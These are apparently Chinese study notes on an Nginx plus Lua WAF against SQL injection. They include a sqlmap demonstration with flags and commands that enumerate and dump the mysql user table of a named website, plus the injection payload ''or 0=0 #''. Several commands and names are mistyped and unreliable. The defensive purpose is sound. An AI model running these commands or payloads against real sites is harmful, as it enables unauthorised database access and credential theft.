背景:保证业务安全,保证业务性能

企业问题

1业务逻辑更新迭代的时候(代码上线,代码更新)

2.外部黑客攻击

Nainx 基于lua实现waf防护

lua :语言

实现wa防护:Nginx利用第三方扩展模块实现nginx扩展功能

实现waf防护的方法:

1.Nginx 结合openresty实现调用lua module 【业务稳定性】

2.nginx 结合lua编辑器直接应用lua module【业务轻量化】

sql注入攻击演示

sql注入:根据sql语句中的逻辑判断漏洞,绕过语句授权表判断,从而直接数据库进入相关操作

危害:提权:root 植入webshell 官网,进入后开个后门,直接注入

神器:Sqlmap sql注入神器 脚本工具,可实现通过自己的密码库,通过撞库的方式。

windows端

官方:https://www.freebuf.com/sectool/164608.html

当然了:还是那句话,警察找你喝茶,别说是我教的

注入指令:

-u   指定需要注入的监测点   指定url
--dbs 暴露当前注入系统的数据库列表
--current-db 暴露当前所访问数据库的名字
--tables 列出表
--colums 暴露字段
-D 指定数据库
-T 指定表
--dump 暴露某一字段的内容

依赖环境python2.7

管理员cmd执行:1.切换cd到攻击工具路径 2. dir查看目录下文件

3.【执行某网站sql】

sqlmap.py -u http://www.keyidecat.xyz/?id=1  --forms--   --dbs  

目前不知哪个数据库 (以表格的方式进行呈现)动态参数 通过sqlmap怎么样检测当前访问链接是否有注入漏洞。

sqlmap.py -u http://www.keyidecat.xyz/?id=1 –forms– -D mysql –tables 【撞库】攻核心数据库

-T user

指定数据库查询该库中的字段名 -C user.host –dump

Nginx实现waf防护

Nginx集成lua

将现有的Nginx进行重新编译,添加lua模块

下载安装lua解析器

lua解析器:http://luajit.org/download/LuallT-2.0-beta3.tar.gz

安装lua ngx模块

Nginx添加lua模块

准备lua waf防护脚本,在脚本写一些过滤危险的策略

ps:naginx -t检查 -c 重启

      永久执行:vim /etc/profile

      ‘or 0=0 #’ #表示释掉password

超详细SQLMap使用攻略及技巧分享

总结:题干就是主防,在nginx中,基于lua实现waf防护sql注入等攻击保护数据库数据安全。